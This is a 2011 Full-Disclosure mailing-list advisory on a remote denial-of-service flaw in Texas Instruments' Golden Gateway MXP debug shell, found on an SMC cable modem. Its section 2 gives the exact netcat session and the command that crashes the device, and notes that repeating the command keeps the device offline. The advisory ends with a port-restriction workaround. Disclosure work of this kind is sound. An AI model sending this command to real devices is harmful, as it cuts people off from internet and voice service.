[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4EFC8CD2.3060102@shakingrock.com>
Date: Thu, 29 Dec 2011 10:52:50 -0500
From: will <will@...kingrock.com>
To: full-disclosure@...ts.grok.org.uk
Subject: DoS in TI Golden Gateway MXP Debug Application
#######################################################################
Will Urbanski
Application: Texas Instruments Golden Gateway MXP Debug Application
http://www.ti.com
Vuln ID: SHR20111201
Version: 2007
Platforms: Embedded (tested on SMC D3GNV Cable Modem)
Bug: input sensitization DoS vuln in `show rtcp_info`
Exploitation: remote
Date: 01 Dec 2011
Author: Will Urbanski
e-mail: will () shakingrock com
permalink: http://www.shakingrock.com/vulns/SHR20111201.txt
#######################################################################
1) Introduction
2) `show rctp_info`
3) Impact
4) Workaround
#######################################################################
===============
1) Introduction
===============
>>From vendor's homepage:
"Golden Gateway® software is designed to run on Texas Instruments (TI) Digital Signal Processors (DSPs). The software, which powers voice, fax and data modem transmission over the Internet, is inside products made by industry leaders such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and data communications equipment manufacturers. "
#######################################################################
==========================================
2) `show rctp_info`
==========================================
Executing `show rctp_info 1` results in system failure due to a critical process being terminated. The show command is normally used to display system information and should not result in application termination.
$ nc 172.16.1.1 4159
��.��!��.��.Texas Instruments Inc. 2007
Golden Gateway Remote Command Processor
MXP>show version
show version
XGCP Version: 2.7.0
CM Version Label: 2.7.0
[...]
MXP>show rtcp_info 1
show rtcp_info 1
MXP>sigterm_prog=0;calling vp880_restart
The DoS can be initiated remotely by simply sending "show rtcp_info 1" to the MXP shell. During some of our tests we were unable to regain internet connectivity until the device had been unplugged. In the event that connectivity is restored spamming "show rtcp_info 1" to the MXP shell will ensure the device stays offline.
#######################################################################
===========
3) Impact
===========
As mentioned on the vendors site the Golden Gateway Remote Command Processor MXP Debug Application is included in many embedded networking devices. "The software, which powers voice, fax and data modem transmission over the Internet, is inside products made by industry leaders such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and data communications equipment manufacturers." This remote denial of service was discovered in an SMC D3GNV DOCSIS 3.0 Multimedia Voice Gateway which provides voice, wifi, and cable internet capabilities. This vulnerability _may_ be found on any device that allows unauthenticated access to the MXP Debug Application shell.
#######################################################################
==============
4) Workaround
==============
Restrict access to port tcp/4159 on devices that are allowing unauthenticated access to the MXP Debug Application.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists